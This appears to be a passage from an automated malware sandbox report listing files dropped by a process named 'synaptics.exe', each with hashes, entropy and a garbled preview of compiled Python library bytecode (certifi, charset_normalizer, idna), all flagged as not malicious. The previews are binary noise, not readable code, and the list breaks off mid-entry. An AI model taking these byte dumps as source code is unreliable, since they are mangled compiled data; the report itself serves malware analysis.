                                                                                                                                                                                                                Preview:o........!.fJ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.d...Z.e.j.d.k.r0d.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.e.j.d.k.rQd.d.l.m.Z.m.Z...d.a.d.a.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.j.e.f...Z.e.e.d.f...Z.....d.d.e.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d.S.).ze.certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents.......N..returnc....................C...s....t...d.d.d.....d.S.).N)..._CACERT_CTX..__exit__..r....r.....;C:\Users\user\Desktop\tmp\lib\site-packages\certifi\core.py..exit_cacert_ctx....s......r....)...........)...as_file..filesc....................C...s4...t.d.u.r.t.t.d.....d.....a.t.t.......a.t...t.....t.S...N..certifi..cacert.pem)..._CACERT_PATHr....r......joinpathr......str..__enter__..atexit..registerr....r....r....r....r......where....s..............r....c....................C...s....t.d.....d...j.d.d...S...Nr....r......ascii....encoding).r....r......read
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1565
                                                                                                                                                                                                                Entropy (8bit):5.691547041597721
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:JV4U0b8ybWPxg+QQMzy/ClB3N/PLo3bIB3Nvh4VMhGlXwu+H2C/4PvBGJOcuUqer:/4jbqjQtyat/c2vhCMhju/C/yv+K/eUy
                                                                                                                                                                                                                MD5:012214884DAA07BBBC4503B705B8993F
                                                                                                                                                                                                                SHA1:FB8314DF73EAC1F8AB1C08ABD506A35D4704C938
                                                                                                                                                                                                                SHA-256:FEA6D8BBFE248E3E92E79419FEC18CB67EF1686228175A9156F6F174D379B0D3
                                                                                                                                                                                                                SHA-512:BF7152F141B2D62F5ED7CF5B7056E3641ECB5A81869DA6805AA1B31E2B4D06C76D3EB5C32E4BCE16251B650E4E41C8AFEA04ED9822F085D52E142E036ED4D481
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fW........................@...sx...d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.e...d.....e.........d.S.).u.....Charset-Normalizer.~~~~~~~~~~~~~~.The Real First Universal Charset Detector..A library that helps you read text from an unknown charset encoding..Motivated by chardet, This package is trying to resolve the issue by taking a new approach..All IANA character set names for which the Python core library provides codecs are supported...Basic usage:. >>> from charset_normalizer import from_bytes. >>> results = from_bytes('B.... ..... ... ..... .. ............ O............!'.encode('utf_8')). >>> best_guess = results.best(). >>> str(best_guess). 'B.... ..... ... ..... .. ............ O............!'..Others methods and usages are available - see the full documentation.at <https://github.com/Ousret/charset_normalizer>..:copyright
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11382
                                                                                                                                                                                                                Entropy (8bit):5.817991079386276
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:9WeJLd8V6fySfPAraft774k4M1Cz9ZZER9OBJzCTrFkYAr64BpmA+ifAgQSK5FQm:9WeJLdcS7ft77cZZaSzCvNm64mA+ifA9
                                                                                                                                                                                                                MD5:65F8AFAA105004B0B5E2C2127430A129
                                                                                                                                                                                                                SHA1:2C8EFFBDC2E71EBF5C72DA0B741BD46534EFC637
                                                                                                                                                                                                                SHA-256:736DF143E538712D98BE9E60B093B3CA06E67A6AC944FCFD94E8C3FDBE51912B
                                                                                                                                                                                                                SHA-512:C88D8B845419788D789545E7AB829C1C45FFA3AC03A9D6E2EAAD086161DBEFED91985DCD4CC43E4FA090049ABB99EB690C0D4F74B489105BCD93E9B3B6C94224
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.T.......................@...sL...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.. d...Z!e.."..Z#e#.$e..%d.........................d(d.e.e&e'f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d.d...Z,..................d(d.e.d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d d!..Z-..................d(d"e.e*e&e.f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e.f.d#d$..Z...................d)d%e.e.e*e.e&f...d.e(d.e(d.e)d.e.e.e*....d.e.e.e*....d.e+d.e+d.e)d.e+d.e+f.d&d'..Z/d.S.)*.....N)...PathLike)...BinaryIO..List..Optional..Set..Union.....)...coherence_ratio..encoding_languages..mb_encoding_languages..merge_coherence_ratios)...IANA_SUPPORTED..TOO_BIG_SEQUENCE..TOO_SMALL_SEQUENCE..TRACE)...mess_ratio)...CharsetMatch..CharsetMatches)...any_specified_encoding..cut_sequence_chunks..iana_name..identify_sig_or_bom..is_cp_similar..is_multi_b
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9643
                                                                                                                                                                                                                Entropy (8bit):5.512142661441853
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:Dq5OeApoIRl8if8gZ+hjj2mspqjrOBTLpPc7nSgGKO56ytTatX79w/kfTYY:u5iTf8g5mymOBT9Pc7nLGKO56yQt7e/G
                                                                                                                                                                                                                MD5:1FB06D9519822F460C57F1D3EFC6C9BE
                                                                                                                                                                                                                SHA1:4561F40C39217B653A9FAFBF34CB85AFC0B21979
                                                                                                                                                                                                                SHA-256:56AD1D2E6E724CFC3819E3FE8044A7D21FB32D7CB77F671D7D02058BF4DD2C33
                                                                                                                                                                                                                SHA-512:6C7790596D60D82079C6150ACE04F2DF861E415E2A87943FB513DC0AD1ED5B3869C63317254EA750FD8DDA33BA04BF11D9895E99154EAABC53B2FA74FCDD6B20
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.2.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.e.d.e.e...f.d.d...Z.d.e.d.e.e...f.d.d...Z.e...d.e.d.e.e...f.d.d.....Z e...d.e.d.e.e...f.d.d.....Z!e.e.d...d.e.d.e.e"e"f...f.d.d.....Z#..d0d.e.e...d.e"d.e.e...f.d.d...Z$d.e.d.e.e...d.e%f.d d!..Z&d"e.d.e.e...f.d#d$..Z'd%e.e...d.e.f.d&d'..Z(d%e.d.e.f.d(d)..Z)e.d*d.....d1d"e.d,e%d-e.e...d.e.f.d.d/....Z*d.S.)2.....N)...IncrementalDecoder)...Counter)...lru_cache).r......Dict..List..Optional..Tuple.....)...FREQUENCIES..KO_NAMES..LANGUAGE_SUPPORTED_COUNT..TOO_SMALL_SEQUENCE..ZH_NAMES).. is_suspiciously_successive_range)...CoherenceMatches)...is_accentuated..is_latin..is_multi_byte_encoding..is_unicode_range_secondary..unicode_range..iana_name..returnc........................s....t.|...r.t.d.....t...d...|.....j.}.|.d.d...}.i...d...t.d.d...D.]/}.|...t.|.g.....}.|.rNt.|...}.|.d.u.r4q.t.|...d.u.rN|...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):30431
                                                                                                                                                                                                                Entropy (8bit):5.8808950140209815
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:dvZKN0taqbKcwF7wuCDnbobpp2dmnFu3GJusAVlufzR7c:dvZ6EKcR7XOP8g8luft7c
                                                                                                                                                                                                                MD5:222438BB16A18E562E4AE01B618EE87C
                                                                                                                                                                                                                SHA1:03162C9FD4229925A405943DC6B76D121B8222DA
                                                                                                                                                                                                                SHA-256:0B65D1469F38B2AF5943B3317CE670314636C7CFEE616B91EA7757D1C15EAA94
                                                                                                                                                                                                                SHA-512:0DE5F9DF4F44A7A493D466D5A4C94C9A388BD1AB84900E4D451C9B7C603E3E760E268030A4FD97F06695B018795BDA404293E106EFE7F42073AB703308FACFC4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1831
                                                                                                                                                                                                                Entropy (8bit):5.48777938186721
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3fwwE8mcebSh3Ue75yubxeNOhsV4Re+NK29:3fwAmcebSyo5yc4NFV4Re+Nn
                                                                                                                                                                                                                MD5:1009C8BB743455077DDF6444EF11D867
                                                                                                                                                                                                                SHA1:74843D43445001F872CAED1720B9046FE1E1F478
                                                                                                                                                                                                                SHA-256:57FCE08C3596E677F60505196F600F9B13F1C6545BB53FB9CA235047FD1E6034
                                                                                                                                                                                                                SHA-512:C7EE532C6066D762C621262E6835925174431CED3D01C989542F5A1BAEB9BF6276882DC466C16BF4413F0E97AD37F3DC1C29B315CC481C37ED481408F2551145
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11526
                                                                                                                                                                                                                Entropy (8bit):5.170467557440603
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:o3OuBwM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:oeuaM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                                                MD5:401F3CAB166C15E51ED7A0779E4CF87E
                                                                                                                                                                                                                SHA1:15CD2925274CF8F94B82C8CD7C5020EA637BD739
                                                                                                                                                                                                                SHA-256:3A9EDD6820BCB0D387EC8CE29F2B7F69A34804CB0E79D2CE6723ACE516E6C9A2
                                                                                                                                                                                                                SHA-512:FBAD3408BA42C729C88EBA09D274D1AC1FB1B923F731148CFA1EB3FB9E75F6D884B4AAF5C22299AAD8DBEED2244068347CE95B99C385E4AEDFB4CD25B08FBA88
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8907
                                                                                                                                                                                                                Entropy (8bit):5.462284194518911
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:DKkSSo/TPTRTa5Tl1T+T8IunXUb2ZQr4lYuoFaFEj:mSQrBalFA8ImESycrFo
                                                                                                                                                                                                                MD5:938A582157CF39D0A5283977EC600AF9
                                                                                                                                                                                                                SHA1:8E0A70685DB56C5CC383CB4BB5F6BC47AD588D81
                                                                                                                                                                                                                SHA-256:825A7334F6C3DB229B2701F9AFB2D09C1C8FD9B411FAE9B53C7FE87D58AF02CF
                                                                                                                                                                                                                SHA-512:7D532781E2DA30026F9738E6DB85F9AE5FFAA86A40D34143A13CE78EF882D9D0B3ECB297982D25F9E77FA8EB496C5E35FB6599AA28DB430C319F739870CA7538
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):251
                                                                                                                                                                                                                Entropy (8bit):5.207648702853754
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:y/j/z/Oszurb64bs5jDGuFM9ArsQx6G3D8Isi:Cj/z/OsJasZrqQ8GT8Iv
                                                                                                                                                                                                                MD5:02B139E6B23FD4594387F184E4149ABF
                                                                                                                                                                                                                SHA1:DC1C6C0C7DB882962B52FFB55BF2A80751438DAB
                                                                                                                                                                                                                SHA-256:BBAD3386FD4BE12BDCFF363D56A11CA10DB47F2BA87BC8314AB22ACDCDD4AE96
                                                                                                                                                                                                                SHA-512:E60E47CDBD01D756828027C208C99A4D1AE4CC793C832419B0A906DB0B6A62466996B420F3E0E387C128A9AE64183828980BE58EA8D139D715A374F6F80BF971
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....IC:\Users\user\Desktop\tmp\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):817
                                                                                                                                                                                                                Entropy (8bit):5.058350317515534
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CeSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/Dnzx5:KijeXL/whvOcAdtOb8fcjOb89TD
                                                                                                                                                                                                                MD5:E0EBB95983EFD234C19BA92C33992AA1
                                                                                                                                                                                                                SHA1:6550011896A3AA5C5E842E2F8A74436F07F5DE14
                                                                                                                                                                                                                SHA-256:E7B552EC0685D30FC2DC662133ADD8DE7D6BB4552FDD9F6776FE8B8E0B904C8D
                                                                                                                                                                                                                SHA-512:497041C441DE475839E6DE02FF9DACFA0FA00F5B673F7E7747861E4BB7474954F2C42EDAEE22145651D39F9B62686CABA9F1468FEEFD05806B7EFCCA36E9C845
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....<C:\Users\user\Desktop\tmp\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9914
                                                                                                                                                                                                                Entropy (8bit):5.44308624083872
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:0ePGIILf6b/+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:PPpIQ+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                                                MD5:FD8850AD8A4A6A5F524DDBE9480E90F0
                                                                                                                                                                                                                SHA1:A813A19299326EA369766ED8F90DCCED9C19C862
                                                                                                                                                                                                                SHA-256:E2224B00EB1F364C89DD93770C3101D80187ECB766B9D60CF20445D257C21D30
                                                                                                                                                                                                                SHA-512:529110FB958DCC6223608A0DFC4A71550C0A834A1788B15B85F97B38CFD10AF3CF8AFCEAEA62653719DEE1A0B17BE1AC9B37D4F35BAC5ECEE83393DC05580BCA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):198616
                                                                                                                                                                                                                Entropy (8bit):3.52080144073603
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:IIS0p2ZbbO4g3aD8yynBXqD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:I621S458yyr
                                                                                                                                                                                                                MD5:51765189ACA9E7BCFB8B67A5B2F5F2F4
                                                                                                                                                                                                                SHA1:B9B75DC209A68ACB1B0F98A8DFBCFE026C6E0AAF
                                                                                                                                                                                                                SHA-256:9896E6F2A1C1E64CA095C1EF3596AD0281274A79CA1A46E3C2C3412A585ECE2A
                                                                                                                                                                                                                SHA-512:4192D6EB00407A48727DC84C3549E1B0667C2E48EC83B5A6380989DED6A28E97B4B00F3BEA84A9931EDE4E6FCD1D6C588E9E375A96F1F560DBD2E64EB62062A5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1949
                                                                                                                                                                                                                Entropy (8bit):5.283699507796706
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:orDo6itCRy/ORh72XN+Rl/99X7iEvR9Bn:orc7kR2XNC/9t7jvN
                                                                                                                                                                                                                MD5:FB685627E412F294FA5D578505A4C5FB
                                                                                                                                                                                                                SHA1:033F6652C9E42A44D3630BACC2F7D2A48270467B
                                                                                                                                                                                                                SHA-256:2348F66CEB5F2E40742CE6E6EE1AC182A561527B9944224653445C846716F729
                                                                                                                                                                                                                SHA-512:262216FBD517928113F97BE0A7916C510D6C00653A63697E19586DDA2CE58AA2121E6031E7BB79F6E5E04254BA90752ED5748C17B02195BF54727F24474F97D8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):176
                                                                                                                                                                                                                Entropy (8bit):4.685395375896109
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:y/hGuletxbkCoeJ/Lt/lPlm5jAuT6MWRIFMHdVWrzSBw5JOmIOt2TgN:y/IqetGCow5G+uGuFM9ArmBw5Ampt2s
                                                                                                                                                                                                                MD5:5651604C8640D12AAFD3283AD47145DD
                                                                                                                                                                                                                SHA1:22804FC2329A8F318B073539D8FFAC0142145894
                                                                                                                                                                                                                SHA-256:0FC2BF2576B9AD3C8AF637C0BF7E359110E2EA36F58EB8FDE2357F593C0145FD
                                                                                                                                                                                                                SHA-512:217EAD4D729E75D1D9F4774D1F172FB18E5617270CA1449DB1B8AD926001B351C454F8AA3250A825569471E1C2ADA0EFAF007DAF4B778BBF00A9F2328D7A0751
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....@C:\Users\user\Desktop\tmp\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3901
